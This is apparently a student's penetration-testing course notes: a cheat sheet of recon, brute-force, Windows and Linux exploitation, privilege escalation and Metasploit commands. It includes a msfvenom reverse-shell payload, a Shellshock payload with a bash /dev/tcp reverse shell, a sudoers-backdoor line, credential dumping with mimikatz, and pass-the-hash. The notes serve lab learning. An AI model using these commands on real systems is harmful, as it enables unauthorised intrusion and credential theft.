- dirb (dirbuster)
- gobuster
- nmap
- hydra
- smbclient
- rpcclient
- enum4linux
- dnsdumpster.io or dnsrecon
- netcraft.com
- smbmap
- arp-scan
- wireshark
- dig
- METASPLOIT AND MSFVENOM (at least rev. tcp meterpreter payload)
- whatweb
- davtest
- cadaver
- crackmapexec
- mimikatz / kiwi
Information Gathering is the first step of any penetration test. It's one of the most important phases, because any further steps are relying on the information we've gathered. Typically we can devide Information-Gathering in two categories:
-
Passive Information Gathering -- Identifying IP addresses & DNS information -- Identifying domain names and domain ownership information -- Identifying email addresses and social media profiles -- Identifying web technologies being used on target sites -- Identify Subdomains
-
Active Information Gathering -- Discovering open ports on target systems -- Learning about the internal infrastructure of a target network/organization -- Enumerating information from targets
- host hackersploit.org -> DNS lookup and get IP-Addresses -> if more than one ipv4 / ipv6 than a proxy or firewall (cloudflare etc.) is likely used by this website.
- check robots.txt file -> is used to refuse crawlers to certain directories / what files should not be indexed
- check sitemap.xml / sitemaps.xml -> provide search engines a sturcture for indexing
- buildwith -> firefox plugin for website technology and cms detection
- wappalyzer -> quite the same as buildwith
- whatweb hackersploit.org -> command for identifying web technologies and plugins that is used (equivalent to plugins mentioned above)
- httrack -> program to copy a website locally for further analysis
- whois hackersploit.org or who.is website-> query dns register
- netcraft.com -> Scan a website for technology, network information, first seen, hsoting history, basic ssl vulnerability check etc.
- Easy to consume infos (collection of all methods / commands mentioned above)
- dnsrecon -d gkd-group.com -> get all dns records (NS, A, TXT, MX ..)
- dnsdumpster.io -> best dns reconnaicance tool for organized information!!!
- wafw00f http://www.gkd-group.com -> check if a waf is used
- sublist3r -d [DOMAIN] (opt. -t threads; -b bruteforce; -e search engines)
- -b belongs to active reconnaicance.
- site: -> limit all results to a given Domain e.g. site: gkd-group.com; site:*.ine.com -> show all subdomains that have been indexed by google.
- inurl: -> search for a part of a url e.g. site:gkd-group.com inurl:wp-content
- intitle: -> specific keyword in site-title
- filetype: -> show all files of a specific filetype e.g. pdf
- intitle:index of -> common vulnerability of directory listing.
- cache: show older versions of a website (for more details better use waybachmachine -> web.archive.org
- Use GOOGLE HACKING DATABASE (GHDB) on exploit-db.com to show some interesting queries.
- theHarvester command / program is preistalled on Kali & Parrot
- theHarvester -d example.com -l 500 -b linkedin -> searches for linkedin information to a given domain
- spyse source is very interesting but requires a subscription
- good for password spraying ;)
- haveibeenpwned.com -> Aggregates various databreaches all over the world
A DNS Zone Transfer is the process to move zone Files from one DNS-Server to another. If misconfigured and left unsecured, this functionality can be abused by attackers to copy the zone files from the primary DNS server to another DNS server. A DNS Zone transfer can provide penetrations testers with a holistic view of an organizations network layout.
- dnsenum example.com -> tries also to perform a Zone transfer
- dig axfr @NAMESERVER DOMAIN -> axfr is the Zone Transfer Switch
- fierce -dns hackersploit.org -> DNS Bruteforce
- sN Option -> No Port-Scan Option, only Host discovery (Also known as Ping Scan or Ping Sweep) [nmap -sn 10.0.0.0/16]
- OR USE NETDISCOVER to discover devices via ARP Requests. [sudo netdisvover]
- Standard NMAP scan is a SYN scan for the 1000 most common ports
- Windows Machine can block Ping requests by default. In this case, NMAP fires up the error "Host seems down.". In this case try the -Pn switch to avoid an availability Ping Scan. (DO not check if host is down)
- nmap -Pn -p- x.x.x.x -> Scanning all Ports
- nmap -Pn -p 80 -> Scan port 80
- nmap -Pn -p 80,445,139 -> Scan a Port selection
- nmap -Pn -p 21-100 -> Scan within a given Range
- By default NMAP will perform a TCP Port-Scan. Use the -sU switch to perform a UDP scan.
- -v switch increases the verbosity
- -sV Service Version detection
- -O switch performs a Operation System Scan (not very accurate)
- -F Fast Switch (scan fewer ports than default)
- -T1-5 switch to speed up a scan (0 = paranoid; 5 = insane)
- -sU -> Perform a UDP Scan, because by default nmap will discover tcp connections. This scan will take some time!
- --top-port 25 --open -> scan top 25 ports and filter for open ports
- Before any Penetration Test will start, a Scope needs to be defined. It's important that a P-test will provide a value for a customer and will not knock-out production systems.
- Physical Access (Physical Security, OSINT, Social Engineering)
- Sniffing (Passive Recon, Watch network traffic)
- ARP ()
- ICMP (Tracroute, Ping)
Tools -> WIRESHARK, ARP-SCAN, PING, FPING, NMAP, ZENMAP
- Run an ARP-SCAN via sudo arp-scan -I eth0 -g 10.0.0.0/16
- Can send packets to multiple hosts at a time
- fping -I eth0 -g 10.0.0.0/16 -a 2>/dev/null (filter out errors with the last part)
"Enumeration is the method that a penetration tester uses to identify information about in-scope assets." "Enumeration is defined as a process which establishes an active connection to the target hosts to discover potential attack vectors..."
- Discover via nmap (Usually Port 445 / 139 TCP).
- Linux: List SMB shares of a Server -> smbclient -L //Server
- Linux: Connect to SMB Share -> smbclient //Server/Share -U USERNAME
- Windows: Connec to SMB Share -> net use Z: \Server\Share PASSWORD /user:USERNAME
- Windows: Direct Access -> \SERVER\SHARE
- Run nmap and identify potential targets that are using smb.
- After a target is identified, run nmap -p445 --script smb-protocols 10.x.x.x -> E.g. check if SMBv1 is used.
- nmap -p445 --script smb-security-mode 10.x.x.x -> e.g. ceck is message signing is disabled.
- nmap -p445 --script smb-enum-sessions 10.x.x.x -> Get active / logged on users with active sessions
- nmap -p445 --script smb-enum-shares 10.x.x.x -> Share enumeration
- nmap -p445 --script smb-enum-users --script-args smbusername=USERNAME,smbpassword=PASSWORD 10.x.x.x
- nmap -p445 --script smb-enum-domains --script-args smbusername=USERNAME,smbpassword=PASSWORD 10.x.x.x 10.x.x.x
- nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=USERNAME,smbpassword=PASSWORD 10.x.x.x -> enum and list share content
- Knowing when there is a Server that supports smbv1, we can utilize smbmap with a null-session.
- smbmap -u guest -p "" -d . -H 10.x.x.x
- If you get results with guest user and a null session for more than read access to IPC$ and print$ share, you should report this.
- SMBmap supports some other commands like uploading a file or listing a shared drive. See Documentation -> https://github.com/ShawnDEvans/smbmap
- metasploit has some samba / smb enumeration and exploit tools
- nmblookup -A
- If we can see IPC$ with a null session you can probably connect via rpc (rpcclient)
- RPC NULL SESSION CONNECT: rpcclient -U '' -N 192.x.x.x
With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following:
- Operating system information
- Details of the parent domain
- A list of local users and groups
- Details of available SMB shares
- The effective system security policy
- Power Tools for Linux and Windows enumeration tasks
- USAGE: enum4linix -o 192.x.x.x
- start metasploit
- use auxiliary/scanner/smb/smb2
- set RHOSTS x.x.x.x
- run
- NMAP smb-enum-users script
- Enum4Linux -> shows users
- rpcclient NULL session and enter following command: enumdomusers
-
Start Metasploit
-
use auxiliary/scanner/smb/smb_login
-
show options
-
at least fill RHOSTS
-
set an smb user
-
set a pass_file
-
run exploit
-
Using Hydra:
-
hydra -l -P smb
- start metasploit
- use auxiliary/scanner/smb/pipe_auditor
- set smbuser
- set smbpass
- set rhosts
- enum4linux -r -u 'admin' -p 'password1' 192.x.x.x
- Maybe use Hydra to Bruteforce ftp: hydra -l -P ftp
- Check for anonymous login: nmap x.x.x.x -p21 --script ftp-anon (Or try manually by username "anonymous" and no password)
- netcat (nc) can also grab a banner by default connection (just like with an nmap service scan)
- nmap x.x.x.x -p22 --script ssh2-enum-algos -> Enumerate Alogrithms for Key creation
- nmap x.x.x.x -p22 --script ssh-hostkey --script-args ssh_hostkey=full -> Grab the full rsa hostkey (WRITE THAT DOWN!)
- nmap x.x.x.x -p22 --script ssh-auth-methods --script-args="ssh.user=admin" -> show authentication methods -> if it shows none_auth THATS DANGEROUS AND WRITE THAT DOWN!
- Dictionary Attack: hydra -l -P /usr/share/wordlists/rockyou.txt ssh
- Bruteforce with NMAP: nmap x.x.x.x -p22 --script ssh-brute --script-args userdb=/root/user
- METASPLOIT: use auxiliary/ssh/ssh_login -> set RHOSTS, set userpass_file, set STOP_ON_SUCCESS, DEFAULT USERNAME IS ROOT
- whatweb -> basic enumeration
- dirb http:// -> Find directories with default wordlist
- browsh --startup-url http://x.x.x.x/Default.aspx -> Rendering a website in shell
- nmap scripts:
- nmap x.x.x.x -sV -p80 --script http-enum
- nmap x.x.x.x -sV -p80 --script http-headers (HTTP HEADER INFORMATION)
- nmap x.x.x.x -sV -p80 --script http-methods --script-args http-methods.url-path=/webdav/ (or something else..)
- nmap x.x.x.x -sV -p80 --script http-webdav-scan --script-args http-methods.url-path=/webdav/ -> WEBDAV Scan
- the same from above applies also here!
- msfconsole
- use auxiliary/scanner/http/http_version (check the options and run)
- use auxiliary/scanner/http/brute_dirs -> Bruteforce / Wordlist Directories
- ROBOTS.TXT: use auxiliary/scanner/http/robots_txt
-
Connect to mysql via shell
- mysql -h x.x.x.x -u root
-
show databases;
-
use database;
-
select * from table;
-
metasploit enumeration on writeable directories of the operating system
- use auxiliary/scanner/mysql/mysql_writable_dirs (set options (dir_list etc.) and run the exploit and maybe set verbose to false because it will tell us a lot :D )
-
dump hashes with metasploit
- use auxiliary/scanner/maysql/mysql_hashdump -> set at least username and password and rhosts -> WRITE HASHES DOWN!
-
load system files (if we have access which should be present to previous enumeration)
- select load_file("/etc/shadow"); -> if that works, WRITE THAT DOWN!
-
check for empty password login with nmap
- nmap x.x.x.x -sV -p 3306 --script=mysql-empty-password
-
nmap x.x.x.x -sV -p3306 --script=mysql-users --script-args="mysqluser='root,mysqlpass=''" -> Write all users down
-
nmap x.x.x.x -sV -p3306 --script=mysql-databases --script-args="mysqluser='root,mysqlpass=''" -> Shows all Databases
-
nmap mysql-audit script can be useful. Check documentation for more info!
-
DICTIONARY ATTACK
- via msfconsole -> use auxiliary/scanner/mysql/mysql_login -> set all options (pass_file etc.), set stop_on_success true and verbose to false!
- via hydra -> hydra -l root -P x.x.x.x mysql
-
nmap x.x.x.x -p1433 --script ms-sql-info -> general information
-
nmap x.x.x.x -p1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 -> ntlm info
-
nmap x.x.x.x -p1433 --script ms-sql-brute --script-args userdb=,passdb= -> Bruteforce / Dictionary Attack
-
nmap x.x.x.x -p1433 --script ms-sql-empty-password -> Check for empty passwords
-
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.128 mssql
-
you can also run querys with nmap, check the documentation.
-
nmap x.x.x.x -p1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria
-
Run cmd command:
- nmap x.x.x.x -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xpcmdshell.cmd="ipconfig" -> Just an example
- nmap x.x.x.x -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xpcmdshell.cmd="type c:\flag"
-
Enumerate MSSQL with Metasploit
- use auxiliary/scanner/mssql/mssql_login -> set rhosts; set user_file; set pass_file -> exploit
- use auxiliary/admin/mssql/mssql_enum -> set rhosts at least...
- use auxiliary/admin/mssql/mssql_enum_sql_logins -> Enumerating possible Logins
- use auxiliary/admin/mssql/mssql_exec -> check if you can run commands -> set cmd whoami (just as an example)
- use auxiliary/admin/mssql/mssql_enum_domain_accounts
-
What is a vulnerability? (NIST) -> A weakness in the computational logic (e.g. code) found in software and hardware components that, wen exploited, results in a negative impact to confidentiality, integrity, or availability.
-
CVE (Common Vulnerabilities and Exposures)
-
NVD (National Vulnerability Database)
- https://www.stigviewer.com/
- https://www.niwcatlantic.navy.mil/scap/ (SCAP Vulnerability Scanner) -> Download here: https://public.cyber.mil/stigs/scap/
- Most frequently exploited windows services
- IIS (TCP 80 /443)
- WebDAV (TCP 80 / 443) -> HTTP extension that allows clients to update, delete, move and copy files in a webserver. (Web Server act as a File-Server)
- SMB / CIFS (TCP 445) -> Network File Sharing
- RDP (TCP 3389) -> GUI Remote Access Protocol
- WinRM (TCP ports 5986/443) -> Windows remote management protocol that can be used to faciliate remote access with Windows Systems
- run nmap -sV -p xxx --script=http-enum x.x.x.x to find out if a webserver uses WebDAV
- run "davtest" command to enumerate with parameters -url -auth username:password to perform some checks of webdav server
- use "cadaver http://xxxxxxxx/webdav/" to access contents within the webdav server
- Get a Payload :)
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f asp > revshell.asp (Get a asp reverse shell via msfvenom)
- upload the payload via cadaver
- start msfconsole with postgresql (systemctl start postgresql or service postgresql start && msfconsole)
- use multi/handler
- set payload windows/meterpreter/reverse_tcp
- specify LHOST and LPORT
- run -> to start the listener and execute the shell on the webdav server.
- SMB is a network file sharing protocol
- SMB is frequently used to share printers or files in a local area network
- SMB runs on TCP 445 and originally on top of NetBIOS (TCP 139)
- SAMABA is the Linux implementation of SMB
SMB Authentication process
PSExec is a lightweight telnet replacement and it is very siliar to RDP (CMD level). PsExec Authentication is performed via SMB.
Bruteforce smb login via metasploit
- use auxiliary/scanner/smb/smb_login
- show options and specify the needed values
Psexec.py is the python linux implementation of psexec Usage: psexec.py Administrator@x.x.x.x cmd.exe
### Exploiting RDP (Bruteforce)
-
RDP runs by default on TCP 3389, but be aware and always do a full scan, because some companies switch to a different port
-
Veryfiy if a port is used for RDP with metasploit module auxiliary/scanner/rdp/rdp_scanner
-
Bruteforce RDP with hydra: hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.0.0.31 -s 3333 (s specifies the Port)
-
use xfreerdp to connect: xfreerdp /u:administrator /p:qwertyuiop /v:10.0.0.31:3333
- Bluekeep allows attackers to remotely execute arbitary code and gain access to a Windows system
- You will always get an elevated shell (system)
- Effects XP, Vista, Windows 7, Windows Server 2008 & R2
- Exploit is very instable and may cause system crashes frequently
- there are msf modules to exploit this vulnerability. Just search for bluekeep
- THIS EXPLOIT IS NOT RECOMMENDED TO RUN IN A VULNERABLITY ASSESSMENT, BECAUSE KERNEL EXPLOITS CAN CRASH SYSTEMS AND MAY CAUSE DATA LOSS!!!!!
-
Windows feature, that can be configured and do not run by default. It is a remote Management Protocol that can be used to facilitate remote access to Windows systems over http(s)
-
It typical uses TCP 5985 and 5986 (https)
-
Various forms of authntication exists, normally by username and password (or by a hash)
-
We can utilize a utility called "crackmapexec" to perform a brute-force on WinRM
-
to obtain a command shell we can use "evil-winrm" (ruby script)
-
crackmapexec winrm x.x.x.x -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt (you can also specify multiple users in a list (just like with the -p parameter above))
-
crackmapexec winrm x.x.x.x -u administrator -p tinkerbell -x "whoami" (Example to run code on a target, x = execute)
-
evil-rinrm.rb -u administrator -p 'tinkerbell' -i x.x.x.x (Directly establish a PowerShell connection, thats AWESOME!)
-
metasploit: search for "winrm_script" and use the exploit (set FORCE_VBS to true; Fill out all required fields) -> This is used to get a meterpreter session and obtain system rights! <3 (But credentials are needed :()
Privilege escalation = elevation of privileges from a user to another (higher priviledged) via exploring vulnerabilities or misconfigurations
Kernel is the core of an Operating System and is resposible for many operations (I/O, Memory Management) The Windows Kernel is Called "Windows NT" and has two operation modes: User Mode (Programs and services running in user mode have limited access to system resources) and Kernel Mode (unrestricted access to system resources) Privilege escalation on Windows systems will typically follow the following methodology:
- Identify kernel vulnerabilities
- Downloading, compiling and transferring kernel exploits to the target system
Kernel exploits are in most cases very unstable and may cause system damage and data loss. Therfore it is not recommended to do that in a pentesting szenario.
To Identify Exploits, use Windows-Exploit-Suggester or Windows-Kernel-Exploits (It compares targets patch level against microsofts vulnerability database
- Windows-Kernel-Exploits: https://github.com/SecWiki/windows-kernel-exploits
- Windows-Exploits-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
-> You can do that with metasploit, just search for suggester post exploitation module (after you have a session; You will need to specify the session as an option.)
-
UAC is the User Account Control and is present in every Version of Windows since Windows Vista.
-
UAC is used to ensure that changes to the os require approval from an administrator
-
Attacks can bypass UAC to execute malicious executables with elevated privileges
-
You will need a local administrators password account! (Thats a prerequisite!)
-
Tool we are going to use: https://github.com/hfiref0x/UACME
-
You will need to transfer this executable to a client and you can use it to run executables with elevated privileges without a confirmation of an admin.
-
When UAC is set to the highest integrity level, it is very difficult to bypass. Only works fine with default settings
-
Used Command in the lab: Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
GET FAMILIAR WITH MSFVENOM (generating rev tcp payload) and IN GENERAL WITH MSFCONSOLE! BYPASSUAC LAB IS GREAT TO LEARN
-
A windows access token is responsible for identifiying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookiue that provides users with access to a system or network resource without having to privide credentials each time a process is started or a resource is accessed.
-
Access tokens are a core element of the authentication process on windows and are created and managed by the Local Security Authority Subsystem Service (LSASS)
-
Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of the same access token.
-
Windows access tokens are categorized based on the varying security levels assigned to them:
- Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons
- Delegate-level tokens are typically created through an interactive login on windows, primilary through a traditinal login or through remote access protocols such as RDP
-
Impersonate-level Tokens = impersonate a token on the LOCAL SYSTEM
-
Delegate-level tokens = can impersonate tokens ON ANY SYSTEM! (extremly dangerous!)
-
Which windows privileges (meterpreter: getprivs) are needed for this attack?
- SeAssignPrimaryToken
- SeCreateToken
- SeImpersonatePrivilege -> This is needed!!
-
We are always looking for admin users with local administrative privileges when performing this attack type.
-
We will be using meterpreter with the buid-in incognito module!
-
load the module: in an active session run "load incognito"
-
list_tokens -u (to list all available user account tokens)
-
copy the name of the access token in quotes, eg "COMPUTERNAME\Administrator"
-
impersonate_token "COMPUTERNAME\Administrator" -> This will impersonate the token and elevate our privs.
-
Alternate Data Streams (ADS) is an NTFS (New Technology File System) file attribute and was designed to provide compatibility with the MacOS HFS (Hierarchical File System)
-
Any file created on an NTFS formatted drive will have two different forks/streams
- Data stream - Default stream that contains the data of the file
- Resource stream - Typically contains the metadata of the file
-
Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection
-
This can be done by storing the malicious code or executables in the file attribute resource stream (metadata) of a legitimate file.
-
This technique is usually used to evade basic signature based AVs and static scanning tools
-
Research again how it's exactly working.
- notepad test.txt:secret.txt
- type payload.exe > test.txt:payload.exe (Hide an executable)
- run this by creating a symbolic link or in cmd via start command (not always working fine)
-
Windows OS stores hashed user accounts passowrds locally in the SAM (Security Accounts Manager) database.
-
Authentication and verification of user credentials is facilitated by the Local Security Authority (LSA)
-
Windows versions up to Windows Server 2003 utilize two different types of hashes:
- LM -> LM is not case sensetive and uses no salts
- NTLM
-
Windows disables LM hashing and utilizes NTLN hashing from Windows Vista onwards!!!
-
It is likely to come across NTLM and NT hashes! LM hashes are completely outdated!
-
The SAM Database can - for security reasons - not be copied while the os is running
-
Attackers can utilize the LSASS process to in-memory dump SAM hashes
-
In modern versions of Windows, the SAM Database is encrypted with a syskey
-
Elevated / Administrative privileges are required in order to access and interact with the LSASS process.
-
NTLM (or NThash) is used by Vista onwards. It is encrypted using the MD4 hashing algorithm.
-
NTLM Hashing process:
- Windows Configuration Files can contain sensetive Information
- Unattended Windows Setup Utility is used for mass installations and can left configuration files on the local client
- The Unattended Windows Setup Utility will typically utilize one of the follwoing configuration files that contain user account and system configuration information:
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Autounattend.xml
- NOTE: THE PASSWORD STRINGS MAY BE ENCODED USING BASE64
-
Mimikatz is the defacto-standard when it comes to post-exploitation on windows systems
-
It allows the extraction of clear-text passwords, hashes and Kerberos tickets from memory
-
It can be used to extract hashes from the lsass.exe process memory where hashes are cached
-
We utilize the pre-compiled mimikatz tool, but you can also the the meterpreter extension called Kiwi
-
Mimicatz will require elevated privileges in order to run correctly (administrator or system)
-
Process in general from a remote computer
- Initial exploit and get a meterpreter session
- try to elevate privs to admin account
- check meterpreter session architecture (x86 is not so good...) with sysinfo
- migrate to the lsass proccess to get a 64bit shell and access to the sam db (with kiwi / mimikatz)
- lsa_dump_sam -> will dump the syskey and the NTLM hashes
- type "help" for help ;)
-
For the use of mimikatz, visit: https://adsecurity.org/?page_id=1821
- privilege::debug
- LSADUMP::SAM -> get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
-
What can we do with hashes we've obtained apart from cracking them?
-
We can utilize NTLM hashes to authenticate with a target system via SMB
-
We can Use the Metasploit PsExec Module or CrackMapExec
-
With PsExec Module
- use ecploit/smb/psexec
- set LPORT, RHOSTS, SMBUser and SMBPass (Here you can specify a clear text password or the hash!)
-
With crackmapexec
- crackmapexec smb x.x.x.x -u Administrator -H "<>"
- hit enter and here you go. (you can specify commands with the -x option (e.g. -x "ipconfig"))
-
winrm can also be used to perform a PTH attack
- Linux Distros share the same Kernel and are all Linux variants. In most cases only the user interface is really different (and the command set in some cases)
-Frequently exploited Linux Services
- Apache Web Server (80 % of Web-Servers globally!!); TCP 80 /443
- SSH; TCP 22
- FTP; TCP 21
- SAMBA; TCP 445
-
Bash is the default shell for nearly all Linux Distros
-
The Shellshock vulnerability is caused by a vulnerability in Bash, wehereby Bash mistakenly executes trailing commands after a series of characters: (){:;};
-
In context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.
-
In oder to exploit this vulnerability, you will need to locate an input vector or script that allows you to communicate with Bash
-
This vulnerability can be exploited both manually (e.g. via Burp) and automatically with the use of MSF exploit module
-
Check if a Webservice is vulnerable: nmap -sV x.x.x.x --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" (specify the location of the uri!)
-
Fire up Brup and intercept a respose from the vulnerable cgi module
-
Send it to repeater and replace the User-Agent to: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd' (Bash Rev. Shell: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1)
-
FTP authentication requires a username and password combination. As a result, we can perform a bruteforce attack in the FTP Server in order to identify legitimate credentials.
-
In some cases, FTP servers may be configured to allow anonymous access, whick consequently allows anyone to access to the FTP server without providing legitimate credentials.
-
Hydra Bruteforce FTP:
- hydra -L /usr/share/.... -P /usr/share/.... -vV 192.168.1.1 ftp (vV is optional)
-
Or use the ftp-brute NMAP Script.
- SSH authentication can be configured in two ways. Username & Password authentication or Key-based authentication (In case of Username and PW, we can bruteforce this shit. (Or at least try it)
- Bruteforce with Hydra: hydra -L /usr/share/... -P /usr/share/... x.x.x.x ssh
-
Network File Sharing Protocol (TCP 445); It is the Linux implementation of SMB
-
SAMBA utilizes a unsername and password authentication and we can perform a bruteforce attack with hydra
-
We can use SMBMap in order to enumerate SAMBA share dirves and list their contents
-
we can use smbclient to connect to a share
-
List samba shares on a target with autnentication
- smbclient -U admin -L //x.x.x.x
-
Login to an samba share
- smbclient -U admin //x.x.x.x/sharename
-
perform a hydra bruteforce attack
- hydra -l admin -P /usr/share/wordlists/.... smb x.x.x.x
- Linux Exploit suggester (for identifying kernel vulnerabilities. Kernel Version and Distribution release version are the most important information) -> https://github.com/mzet-/linux-exploit-suggester
- Downlaod, compile (gcc) and run the exploit
- KERNEL EXPLOITS ARE TARGETING THE KERNEL / CORE OF AN EXPLOIT AND YOU CAN CAUSE CRASHES AND DATA LOSS (not recommended)
-
Linux implements task scheduling through a utility called Cron.
-
Cron is a time-based service that runs applications, script and other commands
-
The crontab file is a configuration file that is used by the Cron utility to store and track Cron Jobs that have been created
-
Cron jobs can also be RUN AS ANY USER ON THE SYSTEM. This is a very important factor to keep an eye on as we will be targeting Cron jobs that have configured to be run as the "root" user.
-
It's crucial to find a file that is used in a cronjob and we have write access to this file with our current priveleges.
-
In the Lab, we were courious about a file called "message" and we didn't have access to it. Its also strage, that this file in the students home is owned by root, but we didn't know the purpose of this specific file.
-
So what we can do is that we can search if the specific path to that file is mentioned in a script. Because mostly scripts are stored in the /usr/ directory, we will search for that. grep -rnw /usr -e "/home/student/message"
-
Get yourself in the sudoers file and allow it all
-
echo 'echo "student ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> copy.sh
-
ELEVATE PRIVS AND GET ROOT SHELL WITH "sudo su"
-
What is the SUID permission?
-
In addition to the three main file access permissions (read, write, execute), Linux also provides users with specialized permissions that can be utilized in specific situations. One of these access permissions is the SUID (Set Owner User ID) permission.
-
When applied, this permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary.
-
SUID permissions are usually used to provide unprivileged users with the ability to run specific scripts or binaries with root permissions.
-
find suid permissions: find / -perm -u=s -type f 2>/dev/null
-
Maybe we find something that we can elevate our Privs...
-
In the lab it was a very easy demonstration. Given two files, one has set the suid bit and the other don't. But the second file waws loaded from the first and we have write privs to that file. So we deleted the loaded file and copied /bin/bash and named it like the loaded file. Now we are root...
- Pass the Hash attacks did'nt really work in Linux, so the only thin we can do with hashes is cracking them!
- All information for all accounts on Linux is stored in the passwd file located under: /etc/passwd
- We cannot view the passwords in the passwd file because they are encrypted
- The passwd file can be read by any user on the system
- ALL ENCRYPTED PASSWORDS FOR THE USERS ARE STORED IN THE SHADOW FILE: /etc/shadow
- The shadow file can only be accessed by the ROOT user
- The Passwd File gives us information about the encryption algorithm that is used (see table)
- Cracking a Linux shadow hash with john the ripper:
- Copy the Line from Shadow (or multiple) in a seperate txt file
- john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
- Mostly john will automatically determine the correct hash algo, but you can also specify that (look at the picture to identify with hash is used)
- Common network services: ARP, DHCP, SMB, FTP, Telnet, SSH
- Tshark is the command-line version of wireshark
- see tshark -h to open the help menu
- Skipped the lab. Look here if you need some help regarding the commands: https://www.wireshark.org/docs/man-pages/tshark.html
- echo 1 > /proc/sys/net/ipv4/ip_forward (Enable IP forwarding)
- arpspoof -i eth1 -t x.x.x.x -r x.x.x.x (t = victim ip; r = router) (basically in the lab, we are targeting the victim server (t) and the client was the router)
- Look at Wireshark and check if we can see some traffic
Metasploit Framework is a penetration testing Framework that provides pentesters with a large database of public tested exploits and a robust infrastructure to automate every stage of the pentest lifecycle. The MSF is designed to be modular, allowing for new functionality to be implemented with ease.
- Metasploit Pro (Commercial)
- Metasploit Express (Commercial)
- Metasploit Framework (Community, Open-Source)
- Exploit: A module that is used to take advantege of vulnerability and is typically paired with a payload
- Payload: Code that is delivered by MSF and remotly executed on the target after successfull exploitation. An exampke of a payload is a reverse shell that initiates a connection from the target system back to the attacker.
- Encoder: Used to encode payloads in order to avoid AV detection. For example, shikata_ga_nai is used to encode windows payloads
- NOPS: Used to ensure that payloads sizes are consistent and ensure the stability of a payload when executed.
- Auxiliary: A module that is used to perform additional functionality like port scanning and enumeration.
When working with payloads, MSF provides you with two types of payloads that can be paired with an exploit:
- Non-Staged Payload - Payload that is sent to thae target system as is along with the exploit
- Staged Payload - A staged payload is sent to the target in two parts, wehreby:
- The first part (stager) contains a payload that is used to establish a reverse connection back to the attacker, download the second part of the payload (stage) and execute it.
Meterpreter Payload is an advanced multi-functional payload that is executed in memory on the target system making it difficult to detect. It communicates over a stager socket and provides an attacker with an interactive command interpreter on the target system.
-
Defacto standard for interacting with MSF (ease-of-use all in one interface)
-
What we need to know:
- How to search for modules?
- How to select modules?
- Hot wo configure module options & values
- How to search for payloads
- Managing sessions
- Additional functionality
- Saving your configuration
-
MSF Module Variables
- They allow us to set typically required information such as an IP Address or a Port.
- MSF supports Global and Local Variables
- Typically userd variables
- LHOST (local Host / Attacker system)
- LPORT (local Port / attackers port)
- RHOST and RHOSTS (one or multiple target IPs)
- RPORT (Target Systems Port)
-
"SEARCH" Command to search for exploits, modules and anything else
-
"USE" to use a module
-
"show options" -> show options of a module
-
"set" RHOSTS -> set a Value of the RHOSTS variable / option
-
use "crtl + c" to stop a module
-
"back" to get out of a module
-
"run" or "exploit" to start the attack
-
search cve:2017 type:exploit platform:-windows (specific search with filters)
- Check db connection with "db_status"
- Check the Help menu with "workspace -h"
- Type "workspace" to check which workspace you are using
- Create a new Workspace "workspace -a WORKSPACE NAME"
- Switch workspace with "workspace WORKSPACE NAME"
- Delete a workspace "workspace -d WORKSPACE NAME"
- Rename a workspace "workspace -r WORKSPACE NEW NAME"
-
We can output the results of our Nmap scan in to a format that can be imported into MSF for vulnerability detection and exploitation
- use the -oX (XML) Option.
-
Import NMAP Scan Results into MSF
- Create a new Workspace e.g. workspace -a NAME
- Import: db_import /root/nmap_result_output
- Check e.g. via the "hosts" or "services" command in MSF
-
Run an NMAP Scan within MSF
- db_nmap -sV .O x.x.x.x (or something else) and the results will be automatically saved in MSF DB / the Workspace
-
Auxiliary modules are used to perform functionality like scanning, discovery and fuzzing
-
We can use auxiliary modules to perform both UDP and TCP Port Scanning as well as enumerating information from services like FTP,SSH and HTTP etc.
-
Auxiliary Modules can be used during the information gathering phase of a penetration test as well as the post exploitation phase.
-
Auxiliary Modules have nothing to do with exploitation, so they have NO PAYLOADS!
-
To perform attacks or enumeration via a jumphost you can use the autoroute command
- in a meterpreter session run "run autoroute -s TARGET IP"
- We can use multiple auxiliary modules to perform Brute-Force attacks because FTP handles authentication with a username and passwort (or anonymous!)
- search :type auxiliary name:ftp (below are some useful modules)
- ftp_version (Version scanner)
- ftp_login (Brute force)
- ftp/anonymous
- smb_version
- smb_enumusers (Enumerate SMB Users)
- smb_enumshares (set SHOWFILES true)
- smb_login (Bruteforce / Dictionary attack)
- search type:auxiliary name:http
- http_version (http Version detection)
- http_header (Header Scan which can be helpful if misconfigured)
- robots_txt (show the robots.txt contents)
- use curl to pull down websites within a shell
- dir_scanner (directory bruteforcing / scanner)
- files_dir (interesting file scanner)
- http_login (Bruteforce on http login form)
- apache_userdir_enum (try to enumerate User accounts)
- http_put
- dir_listing
